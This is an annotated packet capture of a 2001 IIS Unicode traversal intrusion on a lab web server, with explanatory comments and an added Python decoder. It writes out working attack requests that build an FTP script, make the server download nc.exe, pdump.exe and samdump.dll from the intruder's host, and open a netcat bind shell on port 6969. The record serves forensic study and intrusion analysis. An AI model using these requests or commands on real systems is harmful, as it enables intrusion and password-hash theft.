=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:41:03.245941 172.16.1.106:80 -> 213.116.251.162:1874
TCP TTL:127 TOS:0x0 ID:57720 IpLen:20 DgmLen:441 DF
***AP*** Seq: 0x2CBD0981 Ack: 0x9CA64CD0 Win: 0x20FC TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:39:58 GMT..Connection: close..Content-Length: 2
42..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
1 file(s
) copied...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses the Unicode vulnerability (via cmd1.exe) to overwrite the 'ftpcom' FTP script, this time starting with an open command. Note the single '>' here, which truncates the old file; the following lines are appended with '>>'.
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:41:09.452882 213.116.251.162:1875 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11791 IpLen:20 DgmLen:380 DF
***AP*** Seq: 0x9CBF7851 Ack: 0x2CBD224E Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+echo+open+213.116.251.162+>f
tpcom HTTP/1.1..Accept: */*..Accept-Language: en-us..Accept-Enco
ding: gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5
.01; Windows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connec
tion: Keep-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:41:09.578127 172.16.1.106:80 -> 213.116.251.162:1875
TCP TTL:127 TOS:0x0 ID:59000 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBD224E Ack: 0x9CBF79A5 Win: 0x20E4 TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:40:05 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:41:19.638247 213.116.251.162:1876 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11799 IpLen:20 DgmLen:368 DF
***AP*** Seq: 0x9CE70E10 Ack: 0x2CBD4A0C Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+echo+johna2k+>>ftpcom HTTP/1
.1..Accept: */*..Accept-Language: en-us..Accept-Encoding: gzip,
deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows
NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection: Keep-A
live....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:41:19.678605 172.16.1.106:80 -> 213.116.251.162:1876
TCP TTL:127 TOS:0x0 ID:60280 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBD4A0C Ack: 0x9CE70F58 Win: 0x20F0 TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:40:15 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:41:29.810682 213.116.251.162:1877 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11808 IpLen:20 DgmLen:369 DF
***AP*** Seq: 0x9D0E32B4 Ack: 0x2CBD71CB Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+echo+haxedj00+>>ftpcom HTTP/
1.1..Accept: */*..Accept-Language: en-us..Accept-Encoding: gzip,
deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Window
s NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection: Keep-
Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:41:29.851630 172.16.1.106:80 -> 213.116.251.162:1877
TCP TTL:127 TOS:0x0 ID:61816 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBD71CB Ack: 0x9D0E33FD Win: 0x20EF TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:40:25 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:41:39.973817 213.116.251.162:1879 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11822 IpLen:20 DgmLen:371 DF
***AP*** Seq: 0x9D363D8B Ack: 0x2CBD99A8 Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+echo+get+nc.exe+>>ftpcom HTT
P/1.1..Accept: */*..Accept-Language: en-us..Accept-Encoding: gzi
p, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Wind
ows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection: Kee
p-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:41:40.013513 172.16.1.106:80 -> 213.116.251.162:1879
TCP TTL:127 TOS:0x0 ID:63096 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBD99A8 Ack: 0x9D363ED6 Win: 0x20ED TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:40:35 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:41:50.116582 213.116.251.162:1880 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11830 IpLen:20 DgmLen:374 DF
***AP*** Seq: 0x9D5D8AB0 Ack: 0x2CBDC148 Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+echo+get+pdump.exe+>>ftpcom
HTTP/1.1..Accept: */*..Accept-Language: en-us..Accept-Encoding:
gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; W
indows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection:
Keep-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:41:50.155871 172.16.1.106:80 -> 213.116.251.162:1880
TCP TTL:127 TOS:0x0 ID:64632 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBDC148 Ack: 0x9D5D8BFE Win: 0x20EA TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:40:45 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:42:00.324156 213.116.251.162:1881 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11838 IpLen:20 DgmLen:376 DF
***AP*** Seq: 0x9D853285 Ack: 0x2CBDE907 Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+echo+get+samdump.dll+>>ftpco
m HTTP/1.1..Accept: */*..Accept-Language: en-us..Accept-Encoding
: gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01;
Windows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection
: Keep-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:42:00.363806 172.16.1.106:80 -> 213.116.251.162:1881
TCP TTL:127 TOS:0x0 ID:377 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBDE907 Ack: 0x9D8533D5 Win: 0x20E8 TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:40:55 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# The purpose of the script is the same as before.
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:42:10.544150 213.116.251.162:1882 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11847 IpLen:20 DgmLen:365 DF
***AP*** Seq: 0x9DACA7DA Ack: 0x2CBE10F7 Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+echo+quit+>>ftpcom HTTP/1.1.
.Accept: */*..Accept-Language: en-us..Accept-Encoding: gzip, def
late..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT
5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection: Keep-Aliv
e....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] Outbound http Response [**]
02/04-05:42:10.583546 172.16.1.106:80 -> 213.116.251.162:1882
TCP TTL:127 TOS:0x0 ID:1913 IpLen:20 DgmLen:414 DF
***AP*** Seq: 0x2CBE10F7 Ack: 0x9DACA91F Win: 0x20F3 TcpLen: 20
HTTP/1.1 502 Gateway Error..Server: Microsoft-IIS/4.0..Date: Sun
, 04 Feb 2001 12:41:06 GMT..Connection: close..Content-Length: 2
15..Content-Type: text/html....Error in CGI Applica
tion.CGI Error
The specified CGI ap
plication misbehaved by not returning a complete set of HTTP hea
ders. The headers it did return are:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses Unicode vulnerability to kick off the FTP script: 'ftp -s:ftpcom' runs the queued commands unattended, so the
!@# server itself connects out to the intruder's FTP server (next packets). The web server's 502 for this request only
!@# arrives at 05:42:55, once the ftp client has exited.
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:42:21.001718 213.116.251.162:1885 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11861 IpLen:20 DgmLen:360 DF
***AP*** Seq: 0x9DD68A8F Ack: 0x2CBE39CF Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+ftp+-s:ftpcom HTTP/1.1..Acce
pt: */*..Accept-Language: en-us..Accept-Encoding: gzip, deflate.
.User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0;
Hotbar 2.0)..Host: lab.wiretrip.net..Connection: Keep-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:22.623716 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11869 IpLen:20 DgmLen:90 DF
***AP*** Seq: 0x9DDB0EF4 Ack: 0x2CBE3D0D Win: 0x2238 TcpLen: 20
220-Serv-U FTP-Server v2.5h for WinSock ready.....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:23.271644 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11871 IpLen:20 DgmLen:299 DF
***AP*** Seq: 0x9DDB0F26 Ack: 0x2CBE3D0D Win: 0x2238 TcpLen: 20
220--------H-A-C-K T-H-E P-L-A-N-E-T--------..220-W3|_c0m3 T0
JohnA's 0d4y Ef-Tee-Pee S3rv3r...220-Featuring 100% elite hax0r
warez!@$#@..220-Im running win 95 (Release candidate 1), on a p3
3, with 16mb Ram...220 -------H-A-C-K T-H-E P-L-A-N-E-T-------
-..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:23.295141 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:4217 IpLen:20 DgmLen:55 DF
***AP*** Seq: 0x2CBE3D0D Ack: 0x9DDB1029 Win: 0x2103 TcpLen: 20
USER johna2k ..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:23.671412 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11872 IpLen:20 DgmLen:76 DF
***AP*** Seq: 0x9DDB1029 Ack: 0x2CBE3D1C Win: 0x2229 TcpLen: 20
331 User name okay, need password...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:23.676158 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:4729 IpLen:20 DgmLen:55 DF
***AP*** Seq: 0x2CBE3D1C Ack: 0x9DDB104D Win: 0x20DF TcpLen: 20
PASS haxedj00..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# And this time it works
[**] FTP control channel [**]
02/04-05:42:24.138966 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11874 IpLen:20 DgmLen:70 DF
***AP*** Seq: 0x9DDB104D Ack: 0x2CBE3D2B Win: 0x221A TcpLen: 20
230 User logged in, proceed...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:24.147396 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:4985 IpLen:20 DgmLen:65 DF
***AP*** Seq: 0x2CBE3D2B Ack: 0x9DDB106B Win: 0x20C1 TcpLen: 20
PORT 172,16,1,106,12,71..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:24.517966 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11875 IpLen:20 DgmLen:70 DF
***AP*** Seq: 0x9DDB106B Ack: 0x2CBE3D44 Win: 0x2200 TcpLen: 20
200 PORT Command successful...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:24.522065 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:5241 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0x2CBE3D44 Ack: 0x9DDB1089 Win: 0x20A3 TcpLen: 20
RETR nc.exe..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:24.981244 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11877 IpLen:20 DgmLen:106 DF
***AP*** Seq: 0x9DDB1089 Ack: 0x2CBE3D51 Win: 0x21F3 TcpLen: 20
150 Opening ASCII mode data connection for nc.exe (59392 bytes).
..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:37.518867 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11925 IpLen:20 DgmLen:64 DF
***AP*** Seq: 0x9DDB10CB Ack: 0x2CBE3D51 Win: 0x21F3 TcpLen: 20
226 Transfer complete...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:37.542160 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:16249 IpLen:20 DgmLen:65 DF
***AP*** Seq: 0x2CBE3D51 Ack: 0x9DDB10E3 Win: 0x2049 TcpLen: 20
PORT 172,16,1,106,12,72..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:37.895562 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11927 IpLen:20 DgmLen:70 DF
***AP*** Seq: 0x9DDB10E3 Ack: 0x2CBE3D6A Win: 0x21D9 TcpLen: 20
200 PORT Command successful...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:37.899645 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:16505 IpLen:20 DgmLen:56 DF
***AP*** Seq: 0x2CBE3D6A Ack: 0x9DDB1101 Win: 0x202B TcpLen: 20
RETR pdump.exe..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:38.303599 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11929 IpLen:20 DgmLen:109 DF
***AP*** Seq: 0x9DDB1101 Ack: 0x2CBE3D7A Win: 0x21C9 TcpLen: 20
150 Opening ASCII mode data connection for pdump.exe (32768 byte
s)...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# As soon as netcat is downloaded (but before the other files complete), the intruder uses the Unicode vulnerability
!@# to start netcat listening on port 6969; the -e flag hands the socket to cmd1.exe as its stdin/stdout, i.e. a bind shell.
!@# The intruder would then run something like 'nc 172.16.1.106 6969' on their end (the connection from port 1888 below).
!@# NOTE: this instance of cmd1.exe runs with the privileges the web server gave the request (typically the anonymous
!@# IUSR_<machine> account), not SYSTEM, which is why pdump is run through the MDAC vulnerability instead. The listener
!@# has no authentication of its own: anyone who finds port 6969 open gets the same shell.
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:42:42.787971 213.116.251.162:1887 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11951 IpLen:20 DgmLen:372 DF
***AP*** Seq: 0x9E2701A1 Ack: 0x2CBE8B7D Win: 0x2238 TcpLen: 20
GET /msadc/....../....../..%AF../..%C0%AF../program%20files/comm
on%20files/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe HT
TP/1.1..Accept: */*..Accept-Language: en-us..Accept-Encoding: gz
ip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Win
dows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection: Ke
ep-Alive....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
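Added example (not part of the original capture or its annotations): a small Python decoder for the four Unicode requests in this section, reassembled here from the wrapped lines above (constructed input; only the request line is kept). It decodes the %C0%AF overlong form the way the unpatched server did, recovers the command line passed through '?/c+...', labels each command (script line, 'ftp -s' download, 'nc' bind shell) and rebuilds the two ftpcom lines written by the echo requests. The '......' segments are treated as opaque directory names; the decoder makes no claim about how IIS resolved them.

```python
"""Decode the IIS 'Unicode' traversal requests from the capture and recover
the command each one ran.  Added example, not part of the original log."""
import re
from urllib.parse import unquote_to_bytes

# Request lines reassembled from the capture above (the log wraps them at 64
# columns; only the request line is kept).  Constructed input.
SAMPLE_REQUESTS = [
    "GET /msadc/....../....../..%AF../..%C0%AF../program%20files/common%20files"
    "/system/msadc/cmd1.exe?/c+echo+get+samdump.dll+>>ftpcom HTTP/1.1",
    "GET /msadc/....../....../..%AF../..%C0%AF../program%20files/common%20files"
    "/system/msadc/cmd1.exe?/c+echo+quit+>>ftpcom HTTP/1.1",
    "GET /msadc/....../....../..%AF../..%C0%AF../program%20files/common%20files"
    "/system/msadc/cmd1.exe?/c+ftp+-s:ftpcom HTTP/1.1",
    "GET /msadc/....../....../..%AF../..%C0%AF../program%20files/common%20files"
    "/system/msadc/cmd1.exe?/c+nc+-l+-p+6969+-e+cmd1.exe HTTP/1.1",
]


def lenient_utf8(raw: bytes):
    """Decode bytes the way the unpatched server did: a 0xC0/0xC1 lead byte
    plus a continuation byte is accepted as an 'overlong' encoding of an
    ASCII character (C0 AF -> '/', C1 9C -> '\\').  A conforming UTF-8
    decoder rejects these forms; IIS checked the path for '..' and '/'
    before decoding, so the traversal slipped through.  Returns
    (text, findings) with one (offset, sequence, char) per overlong form.
    Other non-ASCII bytes (the lone %AF) are passed through as Latin-1."""
    out, findings, i = [], [], 0
    while i < len(raw):
        b = raw[i]
        if b in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            ch = chr(((b & 0x1F) << 6) | (raw[i + 1] & 0x3F))
            findings.append((i, raw[i:i + 2], ch))
            out.append(ch)
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out), findings


def parse_request(line: str) -> dict:
    """Split a request line into the decoded path, the overlong findings and
    the command line that IIS handed to cmd.exe via '?/c+...'."""
    _method, target, _version = line.split(" ", 2)
    path, _, query = target.partition("?")
    decoded_path, findings = lenient_utf8(unquote_to_bytes(path))
    # '+' is a space in the query string; IIS passed the decoded query to
    # the executable as its command line.
    args, _ = lenient_utf8(unquote_to_bytes(query.replace("+", " ")))
    command = args[3:] if args.startswith("/c ") else args
    return {
        "path": decoded_path,
        "overlong": findings,
        "traversal": ".." in decoded_path and any(c in "/\\" for _, _, c in findings),
        "command": command,
    }


NC_BIND = re.compile(r"\bnc\b.*\s-l\b.*\s-p\s*(\d+).*\s-e\s+(\S+)")


def classify(command: str) -> tuple:
    """Label a recovered command the way the annotations in this log do."""
    m = NC_BIND.search(command)
    if m:
        return ("bind_shell", int(m.group(1)), m.group(2))
    if command.startswith("echo ") and ">>" in command:
        return ("append_to_file", command.rsplit(">>", 1)[1].strip())
    if command.startswith("ftp ") and "-s:" in command:
        return ("ftp_script", command.split("-s:", 1)[1].split()[0])
    return ("other", command)


def reconstruct_ftp_script(commands) -> bytes:
    """Rebuild what the 'echo ... >>ftpcom' requests wrote.  cmd.exe's echo
    emits everything between 'echo ' and the redirection, trailing space
    included, then CRLF (the capture confirms it: 'USER johna2k ' goes out
    with a trailing space)."""
    body = b""
    for cmd in commands:
        if cmd.startswith("echo ") and ">>" in cmd:
            body += cmd[5:].rsplit(">>", 1)[0].encode("ascii") + b"\r\n"
    return body


def analyse(requests) -> dict:
    parsed = [parse_request(r) for r in requests]
    return {
        "commands": [p["command"] for p in parsed],
        "labels": [classify(p["command"]) for p in parsed],
        "ftp_script": reconstruct_ftp_script(p["command"] for p in parsed),
        "all_traversal": all(p["traversal"] for p in parsed),
    }


if __name__ == "__main__":
    result = analyse(SAMPLE_REQUESTS)
    for cmd, label in zip(result["commands"], result["labels"]):
        print(f"{cmd!r:45} -> {label}")
    print("ftpcom fragment:", result["ftp_script"])
```

Running it prints the four recovered commands and the ftpcom fragment from the two echo requests in this section (25 bytes, trailing spaces included); the dir listing further down shows the whole file at 98 bytes, the rest having been written by the earlier echo requests that are not in this section.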
[**] FTP control channel [**]
02/04-05:42:46.346161 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11967 IpLen:20 DgmLen:64 DF
***AP*** Seq: 0x9DDB1146 Ack: 0x2CBE3D7A Win: 0x21C9 TcpLen: 20
226 Transfer complete...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:46.360871 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:23417 IpLen:20 DgmLen:65 DF
***AP*** Seq: 0x2CBE3D7A Ack: 0x9DDB115E Win: 0x1FCE TcpLen: 20
PORT 172,16,1,106,12,73..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:46.795847 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11973 IpLen:20 DgmLen:70 DF
***AP*** Seq: 0x9DDB115E Ack: 0x2CBE3D93 Win: 0x21AF TcpLen: 20
200 PORT Command successful...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:46.800036 172.16.1.106:3142 -> 213.116.251.162:21
TCP TTL:127 TOS:0x0 ID:23673 IpLen:20 DgmLen:58 DF
***AP*** Seq: 0x2CBE3D93 Ack: 0x9DDB117C Win: 0x1FB0 TcpLen: 20
RETR samdump.dll..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:47.228807 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:11975 IpLen:20 DgmLen:111 DF
***AP*** Seq: 0x9DDB117C Ack: 0x2CBE3DA5 Win: 0x219D TcpLen: 20
150 Opening ASCII mode data connection for samdump.dll (36864 by
tes)...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Intruder gets a remote console 'C:\Program Files\Common Files\system\msadc>' (the banner and prompt are cmd.exe's).
!@# Because cmd1.exe reads its commands from the socket rather than a console it echoes each one back, so every
!@# response below starts with the command the intruder typed.
[**] netcat session 6969 [**]
02/04-05:42:49.263766 172.16.1.106:6969 -> 213.116.251.162:1888
TCP TTL:127 TOS:0x0 ID:25465 IpLen:20 DgmLen:155 DF
***AP*** Seq: 0x2CBEA4C2 Ack: 0x9E43FB19 Win: 0x2238 TcpLen: 20
Microsoft(R) Windows NT(TM)..(C) Copyright 1985-1996 Microsoft C
orp.....C:\Program Files\Common Files\system\msadc>
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:42:55.236504 213.116.251.162:21 -> 172.16.1.106:3142
TCP TTL:111 TOS:0x0 ID:12008 IpLen:20 DgmLen:64 DF
***AP*** Seq: 0x9DDB11C3 Ack: 0x2CBE3DA5 Win: 0x219D TcpLen: 20
226 Transfer complete...
